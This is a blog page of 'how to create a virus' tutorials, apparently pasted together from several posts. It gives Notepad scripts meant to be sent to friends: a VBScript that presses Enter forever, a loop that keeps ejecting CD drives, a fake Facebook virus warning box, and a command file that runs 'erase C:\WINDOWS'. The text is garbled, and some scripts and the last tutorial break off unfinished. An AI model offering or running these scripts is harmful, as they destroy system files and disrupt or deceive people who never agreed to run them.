Search This Blog

How to create trojan horse virus

dear,
 trojan horse virus is dengarous virus. so We make a trojan horse virus.
What is trojan horse?
A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.

Frustrate your friend by making this VBScript hit Enter simultaneously:

just open notepad and type this code :


Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

How to create cd room virus

Continually pop out your friend's CD Drive. If he has more than one, it pops out all of them!
just type this code in notepad 


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1

how to create simple but powerful vairus


i will shear u how to create powerful virus using notepad  , its very simple to create :-


1. just Go to notepad and Type
erase C:\WINDOWS,
2. Save IT AS SOMETHING.cmd ,

How to make a facebook virus

Making a fake facebook virus!

1) Open notepad
2) Type this in :



@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE

Create a Fake Virus using Notepad!


There are times where you would want to fool your friend by having a virus in your computer, but actually, it’s just a regular message box. Well, you’re able to do it, using a small code in Notepad that can make it all happen. This is what your final result should be :
Here’s the steps on creating a fake error message box. First off, open Notepad and type this code in: